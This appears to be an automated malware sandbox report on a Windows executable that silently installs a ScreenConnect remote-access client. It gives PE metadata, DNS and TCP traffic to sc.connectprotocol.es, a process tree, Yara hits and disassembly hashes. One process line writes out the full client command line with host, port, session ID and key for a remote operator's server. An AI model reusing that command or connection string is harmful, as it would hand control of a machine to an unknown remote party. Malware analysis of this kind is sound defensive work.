                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                    Sections

                                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                    .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                    .rsrc0x160000x5330740x533200d813d73373778ed5b0a4b71b252379ebunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                    .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                    Resources

                                                                                                                                                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                    FILES0x163d40x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.3962220149253731
                                                                                                                                                                    FILES0x9c3d40x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111589431762695
                                                                                                                                                                    FILES0x2409d40x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415066442757009
                                                                                                                                                                    FILES0x25b5d40x2ec318PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9810924530029297
                                                                                                                                                                    FILES0x5478ec0x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                                                                                                    RT_MANIFEST0x548eec0x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143

                                                                                                                                                                    Imports

                                                                                                                                                                    DLLImport
                                                                                                                                                                    mscoree.dllCorBindToRuntimeEx
                                                                                                                                                                    KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                                                                                                                    OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData

                                                                                                                                                                    Possible Origin

                                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                    EnglishUnited States

                                                                                                                                                                    Network Behavior

                                                                                                                                                                    Network Port Distribution

                                                                                                                                                                    TCP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 3, 2024 16:23:33.165498018 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:23:33.285506010 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:23:33.285624027 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:23:33.937371016 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:23:34.057472944 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:23:34.772422075 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:23:34.815448999 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:23:34.853984118 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:23:34.973916054 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:23:35.366391897 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:23:35.409075022 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:23:35.579916000 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:23:35.706041098 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:23:36.801642895 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:23:36.801899910 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:23:36.921679020 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:23:36.921706915 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:23:36.921850920 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:23:36.921860933 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:23:36.922154903 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:24:36.924963951 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:24:37.045734882 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:25:37.050173998 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:25:37.173549891 CET80414973138.69.12.167192.168.2.4
                                                                                                                                                                    Dec 3, 2024 16:26:37.175321102 CET497318041192.168.2.438.69.12.167
                                                                                                                                                                    Dec 3, 2024 16:26:37.295469999 CET80414973138.69.12.167192.168.2.4

                                                                                                                                                                    UDP Packets

                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                    Dec 3, 2024 16:23:33.000278950 CET5515053192.168.2.41.1.1.1
                                                                                                                                                                    Dec 3, 2024 16:23:33.138247013 CET53551501.1.1.1192.168.2.4

                                                                                                                                                                    DNS Queries

                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 3, 2024 16:23:33.000278950 CET192.168.2.41.1.1.10x6ee2Standard query (0)sc.connectprotocol.esA (IP address)IN (0x0001)false

                                                                                                                                                                    DNS Answers

                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                    Dec 3, 2024 16:23:33.138247013 CET1.1.1.1192.168.2.40x6ee2No error (0)sc.connectprotocol.es38.69.12.167A (IP address)IN (0x0001)false

                                                                                                                                                                    Statistics

                                                                                                                                                                    CPU Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    Memory Usage

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                    Behavior

                                                                                                                                                                    Click to jump to process

                                                                                                                                                                    System Behavior

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:0
                                                                                                                                                                    Start time:10:23:25
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Users\user\Desktop\f53WqfzzNt.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\Desktop\f53WqfzzNt.exe"
                                                                                                                                                                    Imagebase:0xf10000
                                                                                                                                                                    File size:5'620'624 bytes
                                                                                                                                                                    MD5 hash:A27847506C27A6BDE1A5F7D092BF29D2
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1747609157.0000000005A90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1715442940.0000000000F26000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:1
                                                                                                                                                                    Start time:10:23:26
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.3.7.9067\a532d472f1ff1d4e\ScreenConnect.ClientSetup.msi"
                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:2
                                                                                                                                                                    Start time:10:23:26
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                    Imagebase:0x7ff743360000
                                                                                                                                                                    File size:69'632 bytes
                                                                                                                                                                    MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:3
                                                                                                                                                                    Start time:10:23:26
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 247D8C2517E6E69F0B3D03A8794ECC06 C
                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:4
                                                                                                                                                                    Start time:10:23:26
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSIC2F6.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5161843 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                                                                                                    Imagebase:0x1000000
                                                                                                                                                                    File size:61'440 bytes
                                                                                                                                                                    MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:5
                                                                                                                                                                    Start time:10:23:29
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding E58C0E678653AE880B7CA7B7ACABB13E
                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:6
                                                                                                                                                                    Start time:10:23:30
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6B1ED9B9CEA69D2B0631C700B5D80215 E Global\MSI0000
                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                    File size:59'904 bytes
                                                                                                                                                                    MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:7
                                                                                                                                                                    Start time:10:23:30
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=sc.connectprotocol.es&p=8041&s=5b6ef70d-09c3-4123-8987-219271e6483f&k=BgIAAACkAABSU0ExAAgAAAEAAQC1kWKbpg72shug%2fcuGWQB7IuEBcyNy1kcDtCeo3N0RY4axIPh%2fFMztLn0b%2bG2MIuQOrKGq0Xsvxj7WUcZ%2bdIiMwDt7qlLgFko33osOQisFILKOBROsqmoO0CYg%2fpKva7AaAU%2bym8ZeY9OkPYj7knkvh679kRKgwWM5tfC%2fbhzztt1d5pfIewfVI67rLcAGqXh1hUDy%2bbdI6LG6r8m8lQczrbhXAZJ%2fuvXvUGXN6ZWttC7E00yJiy6fPWNioX5EJ%2fn2uX9gCWU%2bpspAIXXJhOyEHV84BHAUT0rgC1re8M9Puttx9uDjI37OpBOLw%2f5qq735uizmWAgUfhfj%2fLZeRyvQ&t=GOLDEN-TEAM-001"
                                                                                                                                                                    Imagebase:0xc00000
                                                                                                                                                                    File size:95'512 bytes
                                                                                                                                                                    MD5 hash:75B21D04C69128A7230A0998086B61AA
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:8
                                                                                                                                                                    Start time:10:23:31
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "e3ab8850-6564-49da-aa7c-f9fea2857c14" "User"
                                                                                                                                                                    Imagebase:0xe60000
                                                                                                                                                                    File size:602'392 bytes
                                                                                                                                                                    MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000000.1778391029.0000000000E62000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000008.00000002.3574448875.00000000030F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 0%, ReversingLabs
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:9
                                                                                                                                                                    Start time:10:23:33
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                    Imagebase:0x7ff6eef20000
                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:10
                                                                                                                                                                    Start time:10:23:34
                                                                                                                                                                    Start date:03/12/2024
                                                                                                                                                                    Path:C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Program Files (x86)\ScreenConnect Client (a532d472f1ff1d4e)\ScreenConnect.WindowsClient.exe" "RunRole" "91491e11-89f3-4d65-94f1-b87642885275" "System"
                                                                                                                                                                    Imagebase:0x200000
                                                                                                                                                                    File size:602'392 bytes
                                                                                                                                                                    MD5 hash:1778204A8C3BC2B8E5E4194EDBAF7135
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1829941114.0000000002341000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 016B7A30 Relevance: 3.9, Strings: 3, Instructions: 191COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: #!$K6$7
                                                                                                                                                                      • API String ID: 0-185628103
                                                                                                                                                                      • Opcode ID: 723ac6dba20e3532923c6049ec2921b6684b05393e45179e7b893ad6d5f7f9fe
                                                                                                                                                                      • Instruction ID: 340a24f86cf7717d15dd02aa0b0586764e905708ea9bb7d123fca287554dc8ff
                                                                                                                                                                      • Opcode Fuzzy Hash: 723ac6dba20e3532923c6049ec2921b6684b05393e45179e7b893ad6d5f7f9fe
                                                                                                                                                                      • Instruction Fuzzy Hash: D261A5313002019FC715AB7DD995AAE7BE7EBC5220354822AE515CB385EF74EDDA8B80
                                                                                                                                                                      Function 016BD540 Relevance: 2.6, Strings: 2, Instructions: 141COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq$Hbq
                                                                                                                                                                      • API String ID: 0-4081012451
                                                                                                                                                                      • Opcode ID: 4161b211a25ed348a67059df12a1a8a10e543c0b38c2fc89680a2a31355cdf32
                                                                                                                                                                      • Instruction ID: c6cfc78ebe0328f479ab555f16436dd0b4f85eb3da9ae5450cb864c8250f8241
                                                                                                                                                                      • Opcode Fuzzy Hash: 4161b211a25ed348a67059df12a1a8a10e543c0b38c2fc89680a2a31355cdf32
                                                                                                                                                                      • Instruction Fuzzy Hash: B441A235B001569BCB04AEADC894AAEBBE2FFC4354F14842AE909DB345DF34DD81CB95
                                                                                                                                                                      Function 016B8A98 Relevance: 1.4, Strings: 1, Instructions: 192COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                      • Opcode ID: 18360eeed28a4ebf7f8929493301c9543e950a55f843ea2abbebfc835cb91e13
                                                                                                                                                                      • Instruction ID: c347dc5f5890499dc19f9c3521a96bbe3cf94abb7fa6141360c83ea72d8df30c
                                                                                                                                                                      • Opcode Fuzzy Hash: 18360eeed28a4ebf7f8929493301c9543e950a55f843ea2abbebfc835cb91e13
                                                                                                                                                                      • Instruction Fuzzy Hash: 6761F574B116059FCB04DF69D9D4AAEB7FAFF8D314B1081A9E506AB365DB30EC058B80
                                                                                                                                                                      Function 016BB9B0 Relevance: 1.3, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: {O@q^
                                                                                                                                                                      • API String ID: 0-3366188919
                                                                                                                                                                      • Opcode ID: 02eb33af315e3d9996abda29603ff058a38d76c9d99ddc21ea61b640fc51c03e
                                                                                                                                                                      • Instruction ID: 213931e87e1d9c30ba741ddaba8b384876dc1d0b457664689f34d4015eae5762
                                                                                                                                                                      • Opcode Fuzzy Hash: 02eb33af315e3d9996abda29603ff058a38d76c9d99ddc21ea61b640fc51c03e
                                                                                                                                                                      • Instruction Fuzzy Hash: D231E232344252AFCB01BB7D99A1AEF3BA6DFC5220344812AD0558B356EE74DC8A87D5
                                                                                                                                                                      Function 016BB9E8 Relevance: 1.3, Strings: 1, Instructions: 80COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: {O@q^
                                                                                                                                                                      • API String ID: 0-3366188919
                                                                                                                                                                      • Opcode ID: f327aba921c9986c6b95939b1b0a06baa9f9170ad880b00df31c4b1879927c23
                                                                                                                                                                      • Instruction ID: acdd3dd3594d83bc70382479a8ab0ab77d525cff4636b9af77b9a2ab6fd5b77b
                                                                                                                                                                      • Opcode Fuzzy Hash: f327aba921c9986c6b95939b1b0a06baa9f9170ad880b00df31c4b1879927c23
                                                                                                                                                                      • Instruction Fuzzy Hash: 1921B031340202AF8B15BA7D99D1AAF76DBEFC42103908129E0268B345EF74ECC687D0
                                                                                                                                                                      Function 016BD078 Relevance: 1.3, Strings: 1, Instructions: 64COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                      • Opcode ID: 09694a43c3ec74d8be15422b64e4e8f7b541c444046ac2bd2c17998054437404
                                                                                                                                                                      • Instruction ID: b2f0fe375826528ceb5a02d99ed6e8b22655b7468f3a1c489552ec7e7bcaf452
                                                                                                                                                                      • Opcode Fuzzy Hash: 09694a43c3ec74d8be15422b64e4e8f7b541c444046ac2bd2c17998054437404
                                                                                                                                                                      • Instruction Fuzzy Hash: E7119D393002059FCB14EB6DD880A6A7BE6FFCD365B248529E41A9B341DF32EC428B50
                                                                                                                                                                      Function 016BD088 Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (bq
                                                                                                                                                                      • API String ID: 0-149360118
                                                                                                                                                                      • Opcode ID: 03d8bce9c1ee24eeaf6dce9a4a7e42315cb5883e17641d925874ff44812163bf
                                                                                                                                                                      • Instruction ID: e030856ce6c29f8c69dc7fb175bf2fb76b83f4b6bce0fb7aafc8f7c361c67803
                                                                                                                                                                      • Opcode Fuzzy Hash: 03d8bce9c1ee24eeaf6dce9a4a7e42315cb5883e17641d925874ff44812163bf
                                                                                                                                                                      • Instruction Fuzzy Hash: 43118F353002059FCB14DB6DD880A6A7BE6EFC9265714842AE45A9B341DF32EC418B50
                                                                                                                                                                      Function 016B0839 Relevance: 1.3, Strings: 1, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.1726935497.00000000016B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016B0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_16b0000_f53WqfzzNt.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: DF
                                                                                                                                                                      • API String ID: 0-2703090862
                                                                                                                                                                      • Opcode ID: 0bf673eba7cfef809cb5e715cb27eb7178cf4f8ba51245e60d8824d94bbff32d
                                                                                                                                                                      • Instruction ID: 43ec4d1e0ae47597a853e0adf44127ca8f5f4ece1586bb24b7b1531bf8f5b687
                                                                                                                                                                      • Opcode Fuzzy Hash: 0bf673eba7cfef809cb5e715cb27eb7178cf4f8ba51245e60d8824d94bbff32d
                                                                                                                                                                      • Instruction Fuzzy Hash: D9114FB4E042099FCB04DFA9D8519AFBBB1AF89300F11856AD415F7391DB359906CF51
                                                                                                                                                                      Function 016B0848 Relevance: 1.3, Strings: 1, Instructions: 50COMMON
